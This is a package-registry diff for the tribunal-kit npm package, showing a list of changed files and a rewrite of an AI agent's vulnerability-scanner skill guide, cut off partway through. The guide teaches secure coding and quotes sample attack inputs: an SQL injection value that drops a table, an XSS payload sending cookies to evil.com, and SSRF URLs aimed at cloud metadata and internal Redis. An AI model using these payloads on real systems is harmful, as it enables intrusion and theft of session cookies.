tribunal-kit 3.0.0 → 4.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (233) hide show
  1. package/.agent/ARCHITECTURE.md +99 -99
  2. package/.agent/GEMINI.md +52 -52
  3. package/.agent/agents/accessibility-reviewer.md +187 -220
  4. package/.agent/agents/ai-code-reviewer.md +199 -233
  5. package/.agent/agents/backend-specialist.md +215 -238
  6. package/.agent/agents/code-archaeologist.md +161 -181
  7. package/.agent/agents/database-architect.md +184 -207
  8. package/.agent/agents/debugger.md +191 -218
  9. package/.agent/agents/dependency-reviewer.md +103 -136
  10. package/.agent/agents/devops-engineer.md +218 -238
  11. package/.agent/agents/documentation-writer.md +201 -221
  12. package/.agent/agents/explorer-agent.md +160 -180
  13. package/.agent/agents/frontend-reviewer.md +160 -194
  14. package/.agent/agents/frontend-specialist.md +248 -237
  15. package/.agent/agents/game-developer.md +48 -52
  16. package/.agent/agents/logic-reviewer.md +116 -149
  17. package/.agent/agents/mobile-developer.md +200 -223
  18. package/.agent/agents/mobile-reviewer.md +162 -195
  19. package/.agent/agents/orchestrator.md +181 -211
  20. package/.agent/agents/penetration-tester.md +157 -174
  21. package/.agent/agents/performance-optimizer.md +183 -203
  22. package/.agent/agents/performance-reviewer.md +178 -211
  23. package/.agent/agents/precedence-reviewer.md +213 -0
  24. package/.agent/agents/product-manager.md +142 -162
  25. package/.agent/agents/product-owner.md +6 -25
  26. package/.agent/agents/project-planner.md +142 -162
  27. package/.agent/agents/qa-automation-engineer.md +225 -242
  28. package/.agent/agents/security-auditor.md +174 -194
  29. package/.agent/agents/seo-specialist.md +193 -213
  30. package/.agent/agents/sql-reviewer.md +161 -194
  31. package/.agent/agents/supervisor-agent.md +184 -203
  32. package/.agent/agents/swarm-worker-contracts.md +17 -17
  33. package/.agent/agents/swarm-worker-registry.md +46 -46
  34. package/.agent/agents/test-coverage-reviewer.md +160 -193
  35. package/.agent/agents/test-engineer.md +0 -21
  36. package/.agent/agents/type-safety-reviewer.md +175 -208
  37. package/.agent/patterns/generator.md +9 -9
  38. package/.agent/patterns/inversion.md +12 -12
  39. package/.agent/patterns/pipeline.md +9 -9
  40. package/.agent/patterns/reviewer.md +13 -13
  41. package/.agent/patterns/tool-wrapper.md +9 -9
  42. package/.agent/rules/GEMINI.md +63 -63
  43. package/.agent/scripts/append_flow.js +72 -0
  44. package/.agent/scripts/case_law_manager.py +525 -0
  45. package/.agent/scripts/compress_skills.py +167 -0
  46. package/.agent/scripts/consolidate_skills.py +173 -0
  47. package/.agent/scripts/deep_compress.py +202 -0
  48. package/.agent/scripts/minify_context.py +80 -0
  49. package/.agent/scripts/security_scan.py +1 -1
  50. package/.agent/scripts/skill_evolution.py +563 -0
  51. package/.agent/scripts/strip_tribunal.py +41 -0
  52. package/.agent/skills/agent-organizer/SKILL.md +100 -126
  53. package/.agent/skills/agentic-patterns/SKILL.md +0 -70
  54. package/.agent/skills/ai-prompt-injection-defense/SKILL.md +134 -160
  55. package/.agent/skills/api-patterns/SKILL.md +123 -215
  56. package/.agent/skills/api-security-auditor/SKILL.md +143 -177
  57. package/.agent/skills/app-builder/SKILL.md +334 -50
  58. package/.agent/skills/app-builder/templates/SKILL.md +13 -15
  59. package/.agent/skills/app-builder/templates/astro-static/TEMPLATE.md +16 -16
  60. package/.agent/skills/app-builder/templates/chrome-extension/TEMPLATE.md +22 -22
  61. package/.agent/skills/app-builder/templates/cli-tool/TEMPLATE.md +18 -18
  62. package/.agent/skills/app-builder/templates/electron-desktop/TEMPLATE.md +20 -20
  63. package/.agent/skills/app-builder/templates/express-api/TEMPLATE.md +17 -17
  64. package/.agent/skills/app-builder/templates/flutter-app/TEMPLATE.md +18 -18
  65. package/.agent/skills/app-builder/templates/monorepo-turborepo/TEMPLATE.md +21 -21
  66. package/.agent/skills/app-builder/templates/nextjs-fullstack/TEMPLATE.md +19 -19
  67. package/.agent/skills/app-builder/templates/nextjs-saas/TEMPLATE.md +26 -26
  68. package/.agent/skills/app-builder/templates/nextjs-static/TEMPLATE.md +26 -26
  69. package/.agent/skills/app-builder/templates/nuxt-app/TEMPLATE.md +19 -19
  70. package/.agent/skills/app-builder/templates/python-fastapi/TEMPLATE.md +18 -18
  71. package/.agent/skills/app-builder/templates/react-native-app/TEMPLATE.md +20 -20
  72. package/.agent/skills/appflow-wireframe/SKILL.md +95 -121
  73. package/.agent/skills/architecture/SKILL.md +169 -331
  74. package/.agent/skills/authentication-best-practices/SKILL.md +139 -173
  75. package/.agent/skills/bash-linux/SKILL.md +129 -154
  76. package/.agent/skills/behavioral-modes/SKILL.md +8 -69
  77. package/.agent/skills/brainstorming/SKILL.md +436 -104
  78. package/.agent/skills/building-native-ui/SKILL.md +152 -174
  79. package/.agent/skills/clean-code/SKILL.md +331 -360
  80. package/.agent/skills/code-review-checklist/SKILL.md +0 -62
  81. package/.agent/skills/config-validator/SKILL.md +115 -141
  82. package/.agent/skills/csharp-developer/SKILL.md +468 -528
  83. package/.agent/skills/database-design/SKILL.md +104 -369
  84. package/.agent/skills/deployment-procedures/SKILL.md +119 -145
  85. package/.agent/skills/devops-engineer/SKILL.md +295 -332
  86. package/.agent/skills/devops-incident-responder/SKILL.md +87 -113
  87. package/.agent/skills/doc.md +5 -5
  88. package/.agent/skills/documentation-templates/SKILL.md +27 -63
  89. package/.agent/skills/edge-computing/SKILL.md +131 -157
  90. package/.agent/skills/extract-design-system/SKILL.md +108 -134
  91. package/.agent/skills/framer-motion-expert/SKILL.md +111 -855
  92. package/.agent/skills/frontend-design/SKILL.md +151 -499
  93. package/.agent/skills/game-design-expert/SKILL.md +79 -105
  94. package/.agent/skills/game-engineering-expert/SKILL.md +96 -122
  95. package/.agent/skills/geo-fundamentals/SKILL.md +97 -124
  96. package/.agent/skills/github-operations/SKILL.md +279 -314
  97. package/.agent/skills/gsap-expert/SKILL.md +119 -826
  98. package/.agent/skills/i18n-localization/SKILL.md +113 -138
  99. package/.agent/skills/intelligent-routing/SKILL.md +167 -127
  100. package/.agent/skills/lint-and-validate/SKILL.md +16 -52
  101. package/.agent/skills/llm-engineering/SKILL.md +344 -357
  102. package/.agent/skills/local-first/SKILL.md +128 -154
  103. package/.agent/skills/mcp-builder/SKILL.md +92 -118
  104. package/.agent/skills/mobile-design/SKILL.md +213 -219
  105. package/.agent/skills/motion-engineering/SKILL.md +184 -0
  106. package/.agent/skills/nextjs-react-expert/SKILL.md +99 -698
  107. package/.agent/skills/nodejs-best-practices/SKILL.md +498 -559
  108. package/.agent/skills/observability/SKILL.md +293 -330
  109. package/.agent/skills/parallel-agents/SKILL.md +96 -122
  110. package/.agent/skills/performance-profiling/SKILL.md +217 -254
  111. package/.agent/skills/plan-writing/SKILL.md +92 -118
  112. package/.agent/skills/platform-engineer/SKILL.md +97 -123
  113. package/.agent/skills/playwright-best-practices/SKILL.md +137 -162
  114. package/.agent/skills/powershell-windows/SKILL.md +112 -146
  115. package/.agent/skills/project-idioms/SKILL.md +87 -0
  116. package/.agent/skills/python-patterns/SKILL.md +15 -35
  117. package/.agent/skills/python-pro/SKILL.md +148 -754
  118. package/.agent/skills/react-specialist/SKILL.md +123 -827
  119. package/.agent/skills/readme-builder/SKILL.md +23 -85
  120. package/.agent/skills/realtime-patterns/SKILL.md +269 -304
  121. package/.agent/skills/red-team-tactics/SKILL.md +18 -51
  122. package/.agent/skills/rust-pro/SKILL.md +623 -701
  123. package/.agent/skills/seo-fundamentals/SKILL.md +129 -154
  124. package/.agent/skills/server-management/SKILL.md +164 -190
  125. package/.agent/skills/shadcn-ui-expert/SKILL.md +181 -206
  126. package/.agent/skills/skill-creator/SKILL.md +24 -56
  127. package/.agent/skills/sql-pro/SKILL.md +579 -633
  128. package/.agent/skills/supabase-postgres-best-practices/SKILL.md +35 -66
  129. package/.agent/skills/swiftui-expert/SKILL.md +151 -176
  130. package/.agent/skills/systematic-debugging/SKILL.md +92 -118
  131. package/.agent/skills/tailwind-patterns/SKILL.md +516 -576
  132. package/.agent/skills/tdd-workflow/SKILL.md +111 -137
  133. package/.agent/skills/test-result-analyzer/SKILL.md +33 -73
  134. package/.agent/skills/testing-patterns/SKILL.md +512 -573
  135. package/.agent/skills/trend-researcher/SKILL.md +30 -71
  136. package/.agent/skills/ui-ux-pro-max/SKILL.md +8 -41
  137. package/.agent/skills/ui-ux-researcher/SKILL.md +51 -91
  138. package/.agent/skills/vue-expert/SKILL.md +127 -866
  139. package/.agent/skills/vulnerability-scanner/SKILL.md +354 -269
  140. package/.agent/skills/web-accessibility-auditor/SKILL.md +168 -193
  141. package/.agent/skills/web-design-guidelines/SKILL.md +25 -61
  142. package/.agent/skills/webapp-testing/SKILL.md +119 -145
  143. package/.agent/skills/whimsy-injector/SKILL.md +58 -132
  144. package/.agent/skills/workflow-optimizer/SKILL.md +28 -68
  145. package/.agent/workflows/api-tester.md +151 -151
  146. package/.agent/workflows/audit.md +127 -138
  147. package/.agent/workflows/brainstorm.md +110 -110
  148. package/.agent/workflows/changelog.md +112 -112
  149. package/.agent/workflows/create.md +124 -124
  150. package/.agent/workflows/debug.md +165 -189
  151. package/.agent/workflows/deploy.md +180 -189
  152. package/.agent/workflows/enhance.md +128 -151
  153. package/.agent/workflows/fix.md +114 -135
  154. package/.agent/workflows/generate.md +13 -4
  155. package/.agent/workflows/migrate.md +160 -160
  156. package/.agent/workflows/orchestrate.md +168 -168
  157. package/.agent/workflows/performance-benchmarker.md +114 -123
  158. package/.agent/workflows/plan.md +173 -173
  159. package/.agent/workflows/preview.md +80 -80
  160. package/.agent/workflows/refactor.md +161 -183
  161. package/.agent/workflows/review-ai.md +101 -129
  162. package/.agent/workflows/review.md +116 -116
  163. package/.agent/workflows/session.md +94 -94
  164. package/.agent/workflows/status.md +79 -79
  165. package/.agent/workflows/strengthen-skills.md +138 -139
  166. package/.agent/workflows/swarm.md +179 -179
  167. package/.agent/workflows/test.md +189 -211
  168. package/.agent/workflows/tribunal-backend.md +94 -113
  169. package/.agent/workflows/tribunal-database.md +95 -115
  170. package/.agent/workflows/tribunal-frontend.md +96 -118
  171. package/.agent/workflows/tribunal-full.md +93 -133
  172. package/.agent/workflows/tribunal-mobile.md +95 -119
  173. package/.agent/workflows/tribunal-performance.md +110 -133
  174. package/.agent/workflows/ui-ux-pro-max.md +122 -143
  175. package/README.md +30 -1
  176. package/bin/tribunal-kit.js +175 -12
  177. package/package.json +25 -4
  178. package/.agent/skills/api-patterns/api-style.md +0 -42
  179. package/.agent/skills/api-patterns/auth.md +0 -24
  180. package/.agent/skills/api-patterns/documentation.md +0 -26
  181. package/.agent/skills/api-patterns/graphql.md +0 -41
  182. package/.agent/skills/api-patterns/rate-limiting.md +0 -31
  183. package/.agent/skills/api-patterns/response.md +0 -37
  184. package/.agent/skills/api-patterns/rest.md +0 -40
  185. package/.agent/skills/api-patterns/security-testing.md +0 -122
  186. package/.agent/skills/api-patterns/trpc.md +0 -41
  187. package/.agent/skills/api-patterns/versioning.md +0 -22
  188. package/.agent/skills/app-builder/agent-coordination.md +0 -71
  189. package/.agent/skills/app-builder/feature-building.md +0 -53
  190. package/.agent/skills/app-builder/project-detection.md +0 -34
  191. package/.agent/skills/app-builder/scaffolding.md +0 -118
  192. package/.agent/skills/app-builder/tech-stack.md +0 -40
  193. package/.agent/skills/architecture/context-discovery.md +0 -43
  194. package/.agent/skills/architecture/examples.md +0 -94
  195. package/.agent/skills/architecture/pattern-selection.md +0 -68
  196. package/.agent/skills/architecture/patterns-reference.md +0 -50
  197. package/.agent/skills/architecture/trade-off-analysis.md +0 -77
  198. package/.agent/skills/brainstorming/dynamic-questioning.md +0 -360
  199. package/.agent/skills/database-design/database-selection.md +0 -43
  200. package/.agent/skills/database-design/indexing.md +0 -39
  201. package/.agent/skills/database-design/migrations.md +0 -48
  202. package/.agent/skills/database-design/optimization.md +0 -36
  203. package/.agent/skills/database-design/orm-selection.md +0 -30
  204. package/.agent/skills/database-design/schema-design.md +0 -56
  205. package/.agent/skills/frontend-design/animation-guide.md +0 -331
  206. package/.agent/skills/frontend-design/color-system.md +0 -329
  207. package/.agent/skills/frontend-design/decision-trees.md +0 -418
  208. package/.agent/skills/frontend-design/motion-graphics.md +0 -306
  209. package/.agent/skills/frontend-design/typography-system.md +0 -363
  210. package/.agent/skills/frontend-design/ux-psychology.md +0 -1116
  211. package/.agent/skills/frontend-design/visual-effects.md +0 -383
  212. package/.agent/skills/intelligent-routing/router-manifest.md +0 -65
  213. package/.agent/skills/mobile-design/decision-trees.md +0 -516
  214. package/.agent/skills/mobile-design/mobile-backend.md +0 -491
  215. package/.agent/skills/mobile-design/mobile-color-system.md +0 -420
  216. package/.agent/skills/mobile-design/mobile-debugging.md +0 -122
  217. package/.agent/skills/mobile-design/mobile-design-thinking.md +0 -357
  218. package/.agent/skills/mobile-design/mobile-navigation.md +0 -458
  219. package/.agent/skills/mobile-design/mobile-performance.md +0 -767
  220. package/.agent/skills/mobile-design/mobile-testing.md +0 -356
  221. package/.agent/skills/mobile-design/mobile-typography.md +0 -433
  222. package/.agent/skills/mobile-design/platform-android.md +0 -666
  223. package/.agent/skills/mobile-design/platform-ios.md +0 -561
  224. package/.agent/skills/mobile-design/touch-psychology.md +0 -537
  225. package/.agent/skills/nextjs-react-expert/1-async-eliminating-waterfalls.md +0 -312
  226. package/.agent/skills/nextjs-react-expert/2-bundle-bundle-size-optimization.md +0 -240
  227. package/.agent/skills/nextjs-react-expert/3-server-server-side-performance.md +0 -490
  228. package/.agent/skills/nextjs-react-expert/4-client-client-side-data-fetching.md +0 -264
  229. package/.agent/skills/nextjs-react-expert/5-rerender-re-render-optimization.md +0 -581
  230. package/.agent/skills/nextjs-react-expert/6-rendering-rendering-performance.md +0 -432
  231. package/.agent/skills/nextjs-react-expert/7-js-javascript-performance.md +0 -684
  232. package/.agent/skills/nextjs-react-expert/8-advanced-advanced-patterns.md +0 -150
  233. package/.agent/skills/vulnerability-scanner/checklists.md +0 -121
@@ -1,269 +1,354 @@
1
- ---
2
- name: vulnerability-scanner
3
- description: Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
4
- allowed-tools: Read, Write, Edit, Glob, Grep
5
- version: 2.0.0
6
- last-updated: 2026-04-01
7
- applies-to-model: gemini-2.5-pro, claude-3-7-sonnet
8
- ---
9
-
10
- # Vulnerability Scanner — Security Analysis Mastery
11
-
12
- > Every input is hostile. Every dependency is a liability. Every secret is one commit from exposure.
13
- > Security is not a feature — it's a constraint on every line of code you write.
14
-
15
- ---
16
-
17
- ## OWASP Top 10 (2025)
18
-
19
- ```
20
- A01 Broken Access Control → Missing authorization checks
21
- A02 Cryptographic Failures Weak encryption, exposed secrets
22
- A03 Injection SQL, XSS, command, LDAP
23
- A04 Insecure Design Missing threat modeling
24
- A05 Security Misconfiguration Default credentials, verbose errors
25
- A06 Vulnerable Components Outdated dependencies
26
- A07 Authentication Failures Weak passwords, missing MFA
27
- A08 Data Integrity Failures → Untrusted deserialization, missing SRI
28
- A09 Logging & Monitoring Failures → No audit trail, alert blindness
29
- A10 SSRF → Server-side request forgery
30
- ```
31
-
32
- ---
33
-
34
- ## Injection Attacks
35
-
36
- ### SQL Injection
37
-
38
- ```typescript
39
- // ❌ VULNERABLE: String interpolation in SQL
40
- const query = `SELECT * FROM users WHERE email = '${email}'`;
41
- // Attack: email = "'; DROP TABLE users; --"
42
-
43
- // ✅ SAFE: Parameterized queries
44
- const result = await db.query("SELECT * FROM users WHERE email = $1", [email]);
45
-
46
- // SAFE: ORM (Prisma, Drizzle)
47
- const user = await prisma.user.findUnique({ where: { email } });
48
-
49
- // ❌ HALLUCINATION TRAP: Template literals are NOT parameterized
50
- // ❌ db.query(`SELECT * FROM users WHERE id = ${id}`); ← VULNERABLE
51
- // db.query("SELECT * FROM users WHERE id = $1", [id]); ← SAFE
52
- ```
53
-
54
- ### XSS (Cross-Site Scripting)
55
-
56
- ```typescript
57
- // ❌ VULNERABLE: innerHTML with user input
58
- element.innerHTML = userComment;
59
- // Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
60
-
61
- // SAFE: textContent (no HTML parsing)
62
- element.textContent = userComment;
63
-
64
- // React auto-escapes by default — BUT:
65
- // VULNERABLE in React:
66
- <div dangerouslySetInnerHTML={{ __html: userInput }} /> // bypasses escaping
67
-
68
- // SAFE in React:
69
- <div>{userInput}</div> // auto-escaped
70
-
71
- // Content Security Policy (defense in depth)
72
- // Add HTTP header:
73
- // Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
74
- ```
75
-
76
- ### SSRF (Server-Side Request Forgery)
77
-
78
- ```typescript
79
- // ❌ VULNERABLE: fetching user-provided URLs
80
- app.get("/proxy", async (req, res) => {
81
- const data = await fetch(req.query.url).then(r => r.text());
82
- res.send(data);
83
- });
84
- // Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
85
- // Attack: url = "http://localhost:6379/" (internal Redis)
86
-
87
- // SAFE: Allowlist of domains
88
- const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);
89
-
90
- app.get("/proxy", async (req, res) => {
91
- const url = new URL(req.query.url as string);
92
- if (!ALLOWED_HOSTS.has(url.hostname)) {
93
- return res.status(403).json({ error: "Domain not allowed" });
94
- }
95
- // Additional: block private IP ranges
96
- const ip = await dns.resolve4(url.hostname);
97
- if (isPrivateIP(ip[0])) {
98
- return res.status(403).json({ error: "Private IP not allowed" });
99
- }
100
- const data = await fetch(url).then(r => r.text());
101
- res.send(data);
102
- });
103
- ```
104
-
105
- ---
106
-
107
- ## Authentication & Authorization
108
-
109
- ```typescript
110
- // JWT Best Practices
111
- import jwt from "jsonwebtoken";
112
-
113
- // SAFE: Specify algorithm explicitly
114
- const token = jwt.sign(payload, SECRET, {
115
- algorithm: "HS256", // explicit
116
- expiresIn: "15m", // short-lived access token
117
- issuer: "myapp",
118
- });
119
-
120
- // ✅ SAFE: Verify with explicit algorithms
121
- const decoded = jwt.verify(token, SECRET, {
122
- algorithms: ["HS256"], // MUST specify — prevents algorithm confusion attack
123
- issuer: "myapp",
124
- });
125
-
126
- // ❌ HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
127
- // jwt.verify(token, SECRET); ← accepts ANY algorithm including "none"
128
- // ✅ jwt.verify(token, SECRET, { algorithms: ["HS256"] });
129
-
130
- // Authorization: check BEFORE business logic
131
- app.delete("/api/posts/:id", async (req, res) => {
132
- const post = await getPost(req.params.id);
133
- if (!post) return res.status(404).json({ error: "Not found" });
134
-
135
- // ✅ Authorization check BEFORE delete
136
- if (post.authorId !== req.user.id && req.user.role !== "admin") {
137
- return res.status(403).json({ error: "Forbidden" });
138
- }
139
-
140
- await deletePost(post.id);
141
- res.status(204).send();
142
- });
143
- ```
144
-
145
- ---
146
-
147
- ## Dependency Security
148
-
149
- ```bash
150
- # Check for known vulnerabilities
151
- npm audit # built-in
152
- npx snyk test # Snyk (more comprehensive)
153
- npx socket check # Socket.dev (supply chain)
154
-
155
- # Auto-fix
156
- npm audit fix
157
-
158
- # lock file integrity
159
- # ✅ Commit package-lock.json / pnpm-lock.yaml
160
- # ✅ Use npm ci in CI (not npm install)
161
- # ✅ Pin exact versions for critical dependencies
162
- # ✅ Enable Dependabot or Renovate for auto-updates
163
- ```
164
-
165
- ```
166
- Supply chain attack vectors:
167
- 1. Typosquatting "recat" instead of "react"
168
- 2. Maintainer hijack compromised npm account
169
- 3. Dependency confusion → private package name exists on public registry
170
- 4. Malicious postinstall → runs arbitrary code on npm install
171
- 5. Abandoned packages → unmaintained, no security patches
172
-
173
- Defense:
174
- - Review new dependencies before adding
175
- - Use npm audit in CI (fail on high severity)
176
- - Pin versions, review lockfile diffs
177
- - Use --ignore-scripts for untrusted packages
178
- ```
179
-
180
- ---
181
-
182
- ## Security Headers
183
-
184
- ```typescript
185
- import helmet from "helmet";
186
-
187
- app.use(helmet()); // Sets secure defaults
188
-
189
- // Key headers set by helmet:
190
- // Content-Security-Policy Controls resource loading
191
- // X-Content-Type-Options Prevents MIME sniffing (nosniff)
192
- // X-Frame-Options Prevents clickjacking (DENY)
193
- // Strict-Transport-Security → Forces HTTPS (HSTS)
194
- // X-XSS-Protection → Legacy XSS filter (deprecated, CSP is better)
195
- // Referrer-Policy → Controls referrer header
196
-
197
- // CORS never wildcard in production
198
- app.use(cors({
199
- origin: ["https://myapp.com", "https://admin.myapp.com"],
200
- methods: ["GET", "POST", "PUT", "DELETE"],
201
- credentials: true,
202
- }));
203
-
204
- // ❌ HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
205
- // ❌ cors({ origin: "*" }) ← allows any website to call your API
206
- // ✅ cors({ origin: ["https://myapp.com"] }) ← whitelist specific domains
207
- ```
208
-
209
- ---
210
-
211
- ## Secret Scanning
212
-
213
- ```
214
- Secrets that MUST be in environment variables:
215
- - Database connection strings
216
- - API keys (Stripe, SendGrid, etc.)
217
- - JWT signing secrets
218
- - OAuth client secrets
219
- - Encryption keys
220
-
221
- Detection tools:
222
- - git-secrets (pre-commit hook)
223
- - TruffleHog / detect-secrets (scan history)
224
- - GitHub secret scanning (automatic)
225
- - GitGuardian (enterprise)
226
-
227
- If a secret is committed:
228
- 1. IMMEDIATELY rotate the secret (new key/password)
229
- 2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
230
- 3. Force-push cleaned history
231
- 4. Audit access logs for the compromised secret
232
- 5. Post-incident review
233
- ```
234
-
235
- ---
236
-
237
- ## 🤖 LLM-Specific Traps
238
-
239
- 1. **Template Literals for SQL:** `\`SELECT * FROM users WHERE id = ${id}\`` is SQL injection. Use parameterized queries.
240
- 2. **`dangerouslySetInnerHTML` Without Sanitization:** React's escape valve for XSS. Never use with user input.
241
- 3. **`jwt.verify()` Without `algorithms`:** Without specifying algorithms, JWT accepts "none" — bypasses all verification.
242
- 4. **CORS `origin: "*"`:** Wildcard CORS disables protection. Always allowlist specific domains.
243
- 5. **Authorization After Business Logic:** Check permissions BEFORE executing the action, not after.
244
- 6. **`npm install` in CI:** Use `npm ci` for deterministic, lockfile-based installs. `npm install` can change lockfile.
245
- 7. **Hardcoded Secrets in Source:** Secrets in code are in git history forever. Use environment variables.
246
- 8. **SSRF Via User URLs:** Never fetch user-provided URLs without domain allowlisting and private IP blocking.
247
- 9. **Missing Rate Limiting on Auth:** Login endpoints without rate limiting enable brute-force attacks.
248
- 10. **Verbose Error Messages in Production:** Stack traces in API responses expose internal implementation details.
249
-
250
- ---
251
-
252
- ## 🏛️ Tribunal Integration
253
-
254
- **Slash command: `/tribunal-backend` or `/audit`**
255
-
256
- ### Pre-Flight Self-Audit
257
-
258
- ```
259
- ✅ Are all SQL queries parameterized (no string interpolation)?
260
- Is user input sanitized before rendering (no innerHTML)?
261
- Does JWT verify specify algorithms explicitly?
262
- Is CORS configured with specific origins (not wildcard)?
263
- Are authorization checks BEFORE business logic?
264
- ✅ Are all secrets in environment variables (not source code)?
265
- Is `npm ci` used in CI (not `npm install`)?
266
- Are security headers configured (helmet)?
267
- Is rate limiting enabled on auth endpoints?
268
- Are error messages generic in production (no stack traces)?
269
- ```
1
+ ---
2
+ name: vulnerability-scanner
3
+ description: Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
4
+ allowed-tools: Read, Write, Edit, Glob, Grep
5
+ version: 3.1.0
6
+ last-updated: 2026-04-06
7
+ applies-to-model: gemini-2.5-pro, claude-3-7-sonnet
8
+ ---
9
+
10
+ # Vulnerability Scanner — Security Analysis Mastery
11
+
12
+ ---
13
+
14
+ ## OWASP Top 10 (2025)
15
+
16
+ ```
17
+ A01 Broken Access Control → Missing authorization checks
18
+ A02 Cryptographic Failures → Weak encryption, exposed secrets
19
+ A03 Injection → SQL, XSS, command, LDAP
20
+ A04 Insecure Design → Missing threat modeling
21
+ A05 Security Misconfiguration Default credentials, verbose errors
22
+ A06 Vulnerable Components Outdated dependencies
23
+ A07 Authentication Failures Weak passwords, missing MFA
24
+ A08 Data Integrity Failures Untrusted deserialization, missing SRI
25
+ A09 Logging & Monitoring Failures No audit trail, alert blindness
26
+ A10 SSRF Server-side request forgery
27
+ ```
28
+
29
+ ---
30
+
31
+ ## Injection Attacks
32
+
33
+ ### SQL Injection
34
+
35
+ ```typescript
36
+ // ❌ VULNERABLE: String interpolation in SQL
37
+ const query = `SELECT * FROM users WHERE email = '${email}'`;
38
+ // Attack: email = "'; DROP TABLE users; --"
39
+
40
+ // SAFE: Parameterized queries
41
+ const result = await db.query("SELECT * FROM users WHERE email = $1", [email]);
42
+
43
+ // ✅ SAFE: ORM (Prisma, Drizzle)
44
+ const user = await prisma.user.findUnique({ where: { email } });
45
+
46
+ // HALLUCINATION TRAP: Template literals are NOT parameterized
47
+ // db.query(`SELECT * FROM users WHERE id = ${id}`); ← VULNERABLE
48
+ // ✅ db.query("SELECT * FROM users WHERE id = $1", [id]); ← SAFE
49
+ ```
50
+
51
+ ### XSS (Cross-Site Scripting)
52
+
53
+ ```typescript
54
+ // VULNERABLE: innerHTML with user input
55
+ element.innerHTML = userComment;
56
+ // Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
57
+
58
+ // SAFE: textContent (no HTML parsing)
59
+ element.textContent = userComment;
60
+
61
+ // React auto-escapes by default BUT:
62
+ // VULNERABLE in React:
63
+ <div dangerouslySetInnerHTML={{ __html: userInput }} /> // bypasses escaping
64
+
65
+ // SAFE in React:
66
+ <div>{userInput}</div> // auto-escaped
67
+
68
+ // Content Security Policy (defense in depth)
69
+ // Add HTTP header:
70
+ // Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
71
+ ```
72
+
73
+ ### SSRF (Server-Side Request Forgery)
74
+
75
+ ```typescript
76
+ // VULNERABLE: fetching user-provided URLs
77
+ app.get("/proxy", async (req, res) => {
78
+ const data = await fetch(req.query.url).then(r => r.text());
79
+ res.send(data);
80
+ });
81
+ // Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
82
+ // Attack: url = "http://localhost:6379/" (internal Redis)
83
+
84
+ // ✅ SAFE: Allowlist of domains
85
+ const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);
86
+
87
+ app.get("/proxy", async (req, res) => {
88
+ const url = new URL(req.query.url as string);
89
+ if (!ALLOWED_HOSTS.has(url.hostname)) {
90
+ return res.status(403).json({ error: "Domain not allowed" });
91
+ }
92
+ // Additional: block private IP ranges
93
+ const ip = await dns.resolve4(url.hostname);
94
+ if (isPrivateIP(ip[0])) {
95
+ return res.status(403).json({ error: "Private IP not allowed" });
96
+ }
97
+ const data = await fetch(url).then(r => r.text());
98
+ res.send(data);
99
+ });
100
+ ```
101
+
102
+ ---
103
+
104
+ ## Authentication & Authorization
105
+
106
+ ```typescript
107
+ // JWT Best Practices
108
+ import jwt from "jsonwebtoken";
109
+
110
+ // SAFE: Specify algorithm explicitly
111
+ const token = jwt.sign(payload, SECRET, {
112
+ algorithm: "HS256", // explicit
113
+ expiresIn: "15m", // short-lived access token
114
+ issuer: "myapp",
115
+ });
116
+
117
+ // ✅ SAFE: Verify with explicit algorithms
118
+ const decoded = jwt.verify(token, SECRET, {
119
+ algorithms: ["HS256"], // MUST specify — prevents algorithm confusion attack
120
+ issuer: "myapp",
121
+ });
122
+
123
+ // ❌ HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
124
+ // ❌ jwt.verify(token, SECRET); ← accepts ANY algorithm including "none"
125
+ // ✅ jwt.verify(token, SECRET, { algorithms: ["HS256"] });
126
+
127
+ // Authorization: check BEFORE business logic
128
+ app.delete("/api/posts/:id", async (req, res) => {
129
+ const post = await getPost(req.params.id);
130
+ if (!post) return res.status(404).json({ error: "Not found" });
131
+
132
+ // Authorization check BEFORE delete
133
+ if (post.authorId !== req.user.id && req.user.role !== "admin") {
134
+ return res.status(403).json({ error: "Forbidden" });
135
+ }
136
+
137
+ await deletePost(post.id);
138
+ res.status(204).send();
139
+ });
140
+ ```
141
+
142
+ ---
143
+
144
+ ## Dependency Security
145
+
146
+ ```bash
147
+ # Check for known vulnerabilities
148
+ npm audit # built-in
149
+ npx snyk test # Snyk (more comprehensive)
150
+ npx socket check # Socket.dev (supply chain)
151
+
152
+ # Auto-fix
153
+ npm audit fix
154
+
155
+ # lock file integrity
156
+ # Commit package-lock.json / pnpm-lock.yaml
157
+ # ✅ Use npm ci in CI (not npm install)
158
+ # Pin exact versions for critical dependencies
159
+ # ✅ Enable Dependabot or Renovate for auto-updates
160
+ ```
161
+
162
+ ```
163
+ Supply chain attack vectors:
164
+ 1. Typosquatting → "recat" instead of "react"
165
+ 2. Maintainer hijack → compromised npm account
166
+ 3. Dependency confusion → private package name exists on public registry
167
+ 4. Malicious postinstall runs arbitrary code on npm install
168
+ 5. Abandoned packages unmaintained, no security patches
169
+
170
+ Defense:
171
+ - Review new dependencies before adding
172
+ - Use npm audit in CI (fail on high severity)
173
+ - Pin versions, review lockfile diffs
174
+ - Use --ignore-scripts for untrusted packages
175
+ ```
176
+
177
+ ---
178
+
179
+ ## Security Headers
180
+
181
+ ```typescript
182
+ import helmet from "helmet";
183
+
184
+ app.use(helmet()); // Sets secure defaults
185
+
186
+ // Key headers set by helmet:
187
+ // Content-Security-Policy → Controls resource loading
188
